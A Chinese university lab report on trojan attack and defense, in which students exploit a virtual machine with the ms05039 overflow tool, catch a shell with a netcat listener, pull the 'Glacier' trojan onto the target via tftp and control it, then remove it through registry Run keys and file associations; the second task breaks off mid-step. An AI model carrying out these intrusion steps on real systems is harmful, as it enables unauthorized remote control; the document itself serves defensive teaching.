- 1、本文档共10页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
《网络安全》实验报告
实验序号:5 实验项目名称:木马攻击与防范实验
学号
姓名
专业、班
实验地点
指导教师
实验时间
一、实验目的及要求
理解和掌握木马传播和运行的机制,掌握检查和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。
二、实验设备(环境)及要求
Windows 2000 server,虚拟机
三、实验内容与步骤
实验任务一:“冰河”木马
本实验需要把真实主机作为攻击机,虚拟机作为靶机。即首先利用ms05039溢出工具入侵虚拟机,然后利用“冰河”木马实现对虚拟机的完全控制。最后对木马进行查杀。
步骤1:入侵准备工作
1)下载和安装木马软件前,关闭杀毒软件的自动防护功能,避免程序会被当作病毒而强行终止。
2)运行G_CLIENT.EXE.
3)选择菜单“设置”-“配置服务程序”.
4)设置访问口令为“1234567”,其它为默认值,点击 “确定”
5)将生成的木马服务程序G_SERVER.EXE拷贝到tftp服务的目录即C:\攻防\tftp32。
6)运行tftpd32.exe。保持此程序一直开启,用于等待攻击成功后传输木马服务程序。
步骤2:进行攻击,将木马放置在被攻击端
1)对靶机P3进行攻击,首先运行 nc -vv -l -p 99
图1 运行nc
接着再开一个dos窗口,运行
ms05039 3 99 1
图2 运行ms
2)攻击成功后,在运行nc -vv -l -p 99 的dos窗口中出现如图3提示,若攻不成功请参照“缓冲区溢出攻击与防范实验”,再次进行攻击。
图3 攻击成功示意
3)在此窗口中运行
tftp -i get g_server.exe
图4 上载木马程序并运行
图5 文件传送
步骤3:运行木马客户程序控制远程主机
打开程序端程序,单击快捷工具栏中的“添加主机”按扭
图6 添加主机
2)“文件管理器”使用。点击各个驱动器或者文件夹前面的展开符号,可以浏览目标主机内容。
图7 成功下载文件后界面
2)“命令控制台”使用。单击“命令控制台”的标签,弹出命令控制台界面
步骤4:删除“冰河”木马
打开
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
如图8。在目录中发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这就是“冰河”木马在注册表中加入的键值,将它删除。
打开
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVesion\Runse
rvices,如图9。在目录中也发现了一个默认的键值C:\WINNT\System32\kernel32.exe,这也是“冰河”在注册表中加入的键值,将它删除。上面两个注册表的子键目录Run和Runservices中存放的键值是系统启动时自启动的程序,一般病毒程序,木马程序,后门程序等都放在这些子键目录下,所以要经常检查这些目录下的程序。
图8 注册表编辑
图9注册表编辑
然后再进入C:\WINNT\System32目录,找到“冰河”的两个可执行文件Kernel32.exe和Sysexplr.exe文件,将它们删除。
图10 删除木马程序
修改文件关联也是木马常用的手段,“冰河”将txt文件的缺省打开方式由notepad.exe改为木马的启动程序,除此之外,html,exe,zip,com等都是木马的目标。所以,最后还需要恢复注册表中的txt文件关联功能,只要将注册表中的
HKEY_CLASSES_ROOT\txtfile\shell\open\command
下的默认值,改为
C:\Windows\notpad.exe %1,即可,如图19。
这样,再次重启计算机我们就完全删除了“冰河”木马。
图11 修改注册表值
实验任务二:“广外男生”木马
本实验将真实机作为攻击机,虚拟机作为靶机。真实机利用“广外男生”木马对虚拟机进行攻击,最终完全取得虚拟机的控制权。最后学习木马的查杀。
1)“广外男生”的连接
运行gwboy.exe,打开“广外男生”的主程序。
图12 网络设置
6)生成代理文件,在“目标文件”中填入所生成服务器端程序的存放位置,如C:\攻防\Tftpd32\hacktest.exe,这个文件就是需要植入远程主机的木马文件。单击“完成”即可完成服务器端程序的设置,这时就生成了一个文件名为hacktest.exe的可执行文件,并将该文件拷贝到虚拟机桌面上。(此时可利用上述的方法拷贝),传输成功:
图13 将该文件拷贝到虚拟机桌面上
(7)进行客户端与服务器连接。在虚拟机上执行木马程序hacktest.exe,等待一段时间后
您可能关注的文档
- 起重机械标准目录.doc
- 信息技术如何优化中职语文课堂教学.doc
- 电子制作实训报告 (1).doc
- 2010年外语系商务英语专业调研报告.doc
- 近代测试技术实验报告.doc
- 络合物磁化率的测定.doc
- 人机交互实验报告1-人机界面概述.doc
- Matlab光学仿真课程设计-基于Matlab相干与非相干照明成像系统的仿真.pdf
- 函数的单调性与导数教学设计与反思.doc
- 信息系统分析与设计实验报告2.doc
- 2024年中国钽材市场调查研究报告.docx
- 2024年中国不锈钢清洗车市场调查研究报告.docx
- 2024年中国分类垃圾箱市场调查研究报告.docx
- 2024年中国水气电磁阀市场调查研究报告.docx
- 2024年中国绿藻片市场调查研究报告.docx
- 2010-2023历年初中毕业升学考试(青海西宁卷)数学(带解析).docx
- 2010-2023历年福建厦门高一下学期质量检测地理卷.docx
- 2010-2023历年初中数学单元提优测试卷公式法(带解析).docx
- 2010-2023历年初中毕业升学考试(山东德州卷)化学(带解析).docx
- 2010-2023历年初中毕业升学考试(四川省泸州卷)化学(带解析).docx
文档评论(0)